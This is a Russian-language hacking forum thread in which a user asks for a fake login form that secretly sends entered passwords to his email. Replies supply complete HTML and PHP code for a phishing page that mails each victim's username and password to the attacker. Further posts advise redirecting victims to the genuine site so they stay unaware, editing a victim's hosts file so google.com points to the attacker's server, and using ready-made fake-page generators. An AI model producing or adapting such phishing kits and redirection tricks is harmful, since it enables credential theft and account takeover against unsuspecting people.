Подставная форма, которая отсылает пассворд на почту

O

OmgImFamous

Профессор
Заблокирован
Регистрация
13 Ноя 2007
Сообщения
237
Реакции
47
  • Автор темы
  • Заблокирован
  • #1
Помогите сделать фейковую форму регистрации

Вводиш логин и пасс (пасс скрытый) но мне на почту отсылается
 
Оо
Обычная форма обратной связи html + обработчик php

Файл index.html
HTML: 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Воруем пароли :D</title>
</head>
<body>

<form method="post" action="send.php">
    <table>
        <tr>
            <td>
                <p>Имя пользователя:</p>
                <input type="text" name="name">
            </td>
        </tr>
        <tr>
            <td>
                <p>Пароль:</p>
                <input type="password" name="pass">
            </td>
        </tr>
        <tr>
            <td>
                <input type="submit" value="Отправить">
            </td>
        </tr>
    </table>
</form>

</body>
</html>

Файл send.php
PHP: 
<?php

if (isset($_POST['name'])){
    $name = $_POST['name'];
}

if (isset($_POST['pass'])){
    $pass = $_POST['pass'];
}

$mail = "example@example.net"; // почта, на которую должно приходить сообщение
$sub = "Гыыыы.. Новый ворованный пароль";
$mes = "Имя: $name \nПользуется таким паролем: $pass";

$send = mail ($mail,$sub,$mes,"Content-type:text/plain; charset = utf8\r\n");

if ($send == 'true')
{
echo "Отправлено!";
}
else
{
echo "Не отправлено";
}
?>
 
  • Автор темы
  • Заблокирован
  • #3
А как скрыть URL?send.php?name=proverka&pass=test1&remember=on
ну, тут очевидно что, логин proverka, пасс - tes1, жертва может кинуть предьявы.. как скрыть такой URL например на.. send.php?success

и желательно сделать редирект на сайт донора, т.е..

if ($send == 'true')
{
echo "Обработка данных удалась, через 10секунд Вас перекинет на сайт mail.ru"; // здесь должен сработать редирект
}
else
{
echo "Ошибка";
}
?>
 
Делайте редик через пхп функу header, яваскрипт не у всех может быть включен.
 
  • Автор темы
  • Заблокирован
  • #6
А подробнее? :))
 
OmgImFamous написал(а):
Помогите сделать фейковую форму регистрации

Вводиш логин и пасс (пасс скрытый) но мне на почту отсылается
Нажмите для раскрытия...
Полно генераторов фейков, например ArxWFakeGen и подобные, указываешь соц.сеть, какие поля отправлять на почту, чуть-чуть стили поправляешь, чтоб актуальные были и пользуешь.
 
Если вы хотите спрятать URL, то есть человек заходит к примеру на google.com и загружается ваша фейковая страница, то вам необходимо изменить hosts. файл в папке Windows/system32/drivers/etc у жертвы написав типо:
188.123.51.1 google.com
188.123.51.1 Для просмотра ссылки Войди или Зарегистрируйся

где IP адрес это адрес вашего сервера который хранит вашу фейковую страницу.

Для того чтобы ваш URL не превращался в /send?name=Vasja&password=123
Необходимо отправлять данные из формы в PHP через POST, пример:
<form method="POST"...
<input type="text" name="название поля"...

в PHP же получать их нужно вот так:
$name = $_POST['название поля'];

---

А вообще шпионить не хорошо :D
 
maksdekka написал(а):
Если вы хотите спрятать URL, то есть человек заходит к примеру на google.com и загружается ваша фейковая страница, то вам необходимо изменить hosts. файл в папке Windows/system32/drivers/etc у жертвы написав типо:
188.123.51.1 google.com
188.123.51.1 Для просмотра ссылки Войди или Зарегистрируйся
Нажмите для раскрытия...
каким-же макаром ты файл hosts изменишь? Если только вручную. Любой антивирь злобно завизжит при попытке доступа программой к этому файлу.
 
yaskin2 написал(а):
каким-же макаром ты файл hosts изменишь? Если только вручную. Любой антивирь злобно завизжит при попытке доступа программой к этому файлу.
Нажмите для раскрытия...
А зачем умничать? Автор темы задал вопрос он получил на него ответ (на счет не палить URL подставной страницы). Есть другие предложения? высказывай
 
Войдите или зарегистрируйтесь для ответа.
Назад
Сверху